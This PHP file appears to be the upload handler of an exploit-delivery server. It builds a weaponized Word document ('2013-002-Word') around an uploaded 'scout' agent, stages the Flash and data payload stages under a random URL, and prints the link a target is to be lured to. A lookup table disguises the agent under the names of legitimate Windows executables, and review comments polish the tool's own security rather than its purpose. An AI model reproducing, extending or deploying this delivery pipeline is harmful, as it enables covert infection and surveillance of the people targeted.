src/exploit_vps/html/admin/upload.php
<?php
// Start-of-request cleanup of the exploit build directory: remove whatever a previous
// (possibly aborted) run left behind before this request's uploads are moved into it.
// Paths and globs are fixed strings, so nothing here comes from the client.
system("rm -rf /var/www/html/admin/2013-002-Word/tmp/*");
foreach (array('swf', 'exe', 'dat', 'docx', 'zip') as $leftover_ext) {
    system("rm -f /var/www/html/admin/2013-002-Word/*" . $leftover_ext);
}
unset($leftover_ext);

// Markers searched for inside the uploaded agent binary by getScoutName(), mapped to the
// executable name the agent is delivered under. Each key is an ASCII product name with a
// NUL byte after every character, i.e. the UTF-16LE form Windows uses for such strings;
// presumably they correspond to the product name in the agent's version resource
// (NOTE(review): confirm against the agent builder).
$scout_names = array(
    "C\x00a\x00t\x00a\x00l\x00y\x00s\x00"                                                 => "CCC.exe",
    "P\x00o\x00w\x00e\x00r\x00D\x00V\x00D\x00"                                             => "PDVD9Serv.exe",
    "H\x00D\x00 \x00A\x00u\x00d\x00i\x00o\x00"                                             => "RtDCpl.exe",
    "O\x00u\x00t\x00-\x00o\x00f\x00-\x00B\x00r\x00o\x00w\x00s\x00e\x00r\x00"               => "sllauncher.exe",
    "L\x00i\x00v\x00e\x00 \x00I\x00D\x00 \x00S\x00e\x00r\x00v\x00i\x00c\x00e\x00"         => "WLIDSVCM.exe",
);
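/**
 * Work out which executable name an uploaded agent binary should be delivered under.
 *
 * Reads the whole file and looks for the marker strings in the module-level
 * $scout_names table (UTF-16LE product names); the first one found selects the name.
 *
 * @param string $scout_full_path  path of the uploaded agent binary
 * @return string  the mapped executable name, or "" when no known marker is present
 *
 * Terminates the request ("Bad scout version") when the file cannot be read or does
 * not carry the "Iaskdj2AS" build marker every accepted agent is expected to contain.
 */
function getScoutName($scout_full_path)
{
    global $scout_names;

    // strpos() is binary-safe, so the NUL-containing markers can be searched directly.
    $scout_buff = file_get_contents($scout_full_path);
    if ($scout_buff === false)
        die("Bad scout version\n");

    // Compare against false explicitly: the original `!strpos()` form also rejected a
    // marker sitting at offset 0, since 0 is falsy.
    if (strpos($scout_buff, "Iaskdj2AS") === false)
        die("Bad scout version\n");

    foreach ($scout_names as $marker => $exe_name) {
        if (strpos($scout_buff, $marker) !== false)
            return $exe_name;
    }

    // Unknown build; the caller treats "" as fatal.
    return "";
}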
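/**
 * Generate a random lowercase-alphanumeric token of $qtd characters.
 *
 * The token names the per-request staging directory under /documents/, so it is the
 * only thing standing between a staged payload and anyone enumerating URLs. rand() is
 * deterministically seeded and easy to predict; use the CSPRNG where the runtime
 * provides it (PHP >= 7.0) and fall back to mt_rand() otherwise.
 *
 * @param int $qtd  number of characters to generate
 * @return string  token drawn from [a-z0-9]; "" when $qtd <= 0
 */
function GeraHash($qtd)
{
    // Alphabet: safe both as a directory name and as a URL path component.
    $caracteres = 'abcdefghijklmnopqrstuvwxyz0123456789';
    $ultimo = strlen($caracteres) - 1;
    $usaCsprng = function_exists('random_int');

    $hash = '';
    for ($i = 1; $i <= $qtd; $i++) {
        // mt_rand() is still not cryptographically strong; it is only the pre-7.0 fallback.
        $posicao = $usaCsprng ? random_int(0, $ultimo) : mt_rand(0, $ultimo);
        $hash .= $caracteres[$posicao];
    }
    return $hash;
}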
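/**
 * Return the first directory entry whose name contains $suffix.
 *
 * Despite the parameter name this is a substring test (strstr), not an end-of-name
 * test: "x.swf.bak" matches '.swf'. Kept that way because callers pass tool-generated
 * names. Which entry wins when several match depends on readdir() order.
 *
 * @param string $path    directory to scan (trailing slash optional)
 * @param string $suffix  substring to look for in entry names
 * @return string  the matching entry name, or the sentinel "NAN" when nothing matches
 *                 or the directory cannot be opened
 */
function getName($path, $suffix)
{
    // Original dereferenced a failed opendir(); return the sentinel instead.
    if (!is_dir($path) || ($handle = opendir($path)) === false)
        return "NAN";

    $found = "NAN";
    // Compare with false explicitly: a bare `while ($f = readdir())` stops early on an
    // entry literally named "0".
    while (($entry = readdir($handle)) !== false) {
        if (strstr($entry, $suffix) !== false) {
            $found = $entry;
            break;
        }
    }
    closedir($handle);
    return $found;
}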
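// ---- Per-request build of a 2013-002-Word delivery package ---------------------------
//
// Inputs (all client-controlled, from the admin upload form):
//   $_FILES['original']  the .docx shown to the target; its client-supplied name is reused
//                        for the staged file and for the download URL
//   $_FILES['scout']     the agent executable to deliver (optional on the DEMO path)
//   $_POST['DEMO']       "y" selects exploit_demo.py and the fixed agent name "demo.exe"
// Output: the URL under /documents/<random>/ the target is to be lured to.
//
// NOTE(review): nothing in this file authenticates the caller; access control is assumed to
// come from the web server configuration protecting /admin/ — confirm before deploying.

// The staging directory name is the only thing stopping enumeration of staged payloads
// under /documents/, so it must be unguessable (see GeraHash()).
$rand_directory = GeraHash(8);

$demo = isset($_POST['DEMO']) && $_POST['DEMO'] == "y";

// The document is needed on every path; the agent binary only outside DEMO mode, where
// getScoutName() reads it. Fail before creating any directories.
if (!isset($_FILES['original']['tmp_name']) || !is_uploaded_file($_FILES['original']['tmp_name']))
    die('Files not uploaded');
if (!$demo && (!isset($_FILES['scout']['tmp_name']) || !is_uploaded_file($_FILES['scout']['tmp_name'])))
    die('Files not uploaded');

// The client-supplied filename is reused as a path component (copy(), file_put_contents(),
// the echoed URL) and as a shell argument. Strip any directory part so it cannot escape
// the staging directories, and shell-escape it once for every system() call below.
$original_name = basename($_FILES['original']['name']);
if ($original_name === '' || $original_name === '.' || $original_name === '..')
    die('Bad file name');
$original_arg = escapeshellarg($original_name);

if (!mkdir('../files/'.$rand_directory)) die('Unable to create directory');
if (!mkdir('../files/'.$rand_directory."/cnt")) die('Unable to create directory');

$build_dir = "/var/www/html/admin/2013-002-Word";
$cwd = getcwd();
if (!chdir($build_dir))
    die('Unable to enter build directory');

// Both uploads are placed under fixed names in the build directory; the python builder
// below refers to them by those names.
if (!move_uploaded_file($_FILES['original']['tmp_name'], "$build_dir/original.docx"))
    die('Unable to store original document');
if (isset($_FILES['scout']['tmp_name'])
        && !move_uploaded_file($_FILES['scout']['tmp_name'], "$build_dir/agent.exe"))
    die('Unable to store scout');

// NOTE(review): depending on server configuration (UseCanonicalName) SERVER_NAME derives
// from the client's Host header, so treat it as untrusted: it is shell-escaped below and
// ends up in the URL embedded in the payload.
$urlbase = 'http://'.$_SERVER['SERVER_NAME'].'/documents/'.$rand_directory.'/';

// Name the agent is dropped under on the target: fixed in DEMO mode, otherwise looked up
// from the marker table in getScoutName().
$scout_name = $demo ? "demo.exe" : getScoutName("$build_dir/agent.exe");
if ($scout_name === "")
    die('Unable to get scout name! :(');

// Scratch area for the builder's output, removed again at the end of the request.
// NOTE(review): /tmp is shared; a pre-existing entry of that name makes mkdir() fail.
if (!mkdir("/tmp/$rand_directory"))
    die('Unable to create directory');

// The builder wants the document under its user-visible name; also zip it for the
// "original" download variant.
if (!copy("original.docx", $original_name))
    die('Unable to stage original document');
system("zip /tmp/$rand_directory/original.zip $original_arg > /dev/null 2>&1");

// Builder invocation. Every variable argument goes through escapeshellarg(): $urlbase and
// $original_arg are client-influenceable, $scout_name comes from a fixed table.
// NOTE(review): /tmp/py.log is a fixed, shared path — concurrent requests clobber each
// other's log, and a symlink planted there is followed.
$builder_args = 'payload:http ' . escapeshellarg($urlbase)
    . ' sendtotarget.zip original.docx ' . $original_arg
    . ' agent.exe server.zip ' . escapeshellarg($scout_name);
if ($demo)
    system("python26 exploit_demo.py $builder_args DEMO > /tmp/py.log 2>&1");
else
    system("python26 exploit.py $builder_args > /tmp/py.log 2>&1");

// Unpack the builder's server-side pieces (stage1 .swf, stage2 .dat) into the scratch dir.
system("unzip -d /tmp/$rand_directory server.zip >> /tmp/py.log 2>&1");
chdir($cwd);

// Publish under ../files/<rand>/: for each downloadable piece, a PHP fragment named after
// the file the target will request, pointing at the real content under cnt/. Presumably
// the /documents/ handler include()s these fragments (NOTE(review): confirm).
$directory = '../files/'.$rand_directory;

$conf = array(
    'modified' => 'cnt/modified.zip',
    'original' => 'cnt/original.zip',
    'browsercheck' => true,
    'content-type' => 'application/msword',
    'hits' => 1,
);
$target_zip_name = str_replace(".docx", ".zip", $original_name);
file_put_contents("$directory/$target_zip_name", '$conf = '.var_export($conf, true).';');
copy("$build_dir/sendtotarget.zip", "$directory/cnt/modified.zip");
copy("/tmp/$rand_directory/original.zip", "$directory/cnt/original.zip");

$conf = array(
    'modified' => 'cnt/stage1',
    'hits' => 1,
);
$stage1_name = getName("/tmp/$rand_directory/", '.swf');
if ($stage1_name == "NAN")
    die("Stage1 blank");
file_put_contents("$directory/".$stage1_name, '$conf = '.var_export($conf, true).';');
copy("/tmp/$rand_directory/$stage1_name", "$directory/cnt/stage1");

$conf = array(
    'modified' => 'cnt/stage2',
    'hits' => 1,
);
$stage2_name = getName("/tmp/$rand_directory/", '.dat');
if ($stage2_name == "NAN")
    die("Stage2 blank");
file_put_contents("$directory/".$stage2_name, '$conf = '.var_export($conf, true).';');
copy("/tmp/$rand_directory/$stage2_name", "$directory/cnt/stage2");

// Result for the operator: the URL the target is to be lured to. Emitted raw as before;
// NOTE(review): $target_zip_name is client-derived, so if this response is ever rendered
// in a browser it needs htmlspecialchars()/rawurlencode() — depends on the consumer.
echo 'http://'.$_SERVER['SERVER_NAME'].'/documents/'.$rand_directory.'/'.$target_zip_name;

// Scrub the build directory and scratch area. This only runs on the success path: any
// die() above leaves the uploads in $build_dir until the next request's start-up cleanup.
system("rm -rf $build_dir/tmp/*");
system("rm -rf /tmp/$rand_directory");
foreach (array('swf', 'exe', 'dat', 'docx', 'zip') as $leftover_ext)
    system("rm -f $build_dir/*$leftover_ext");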
?>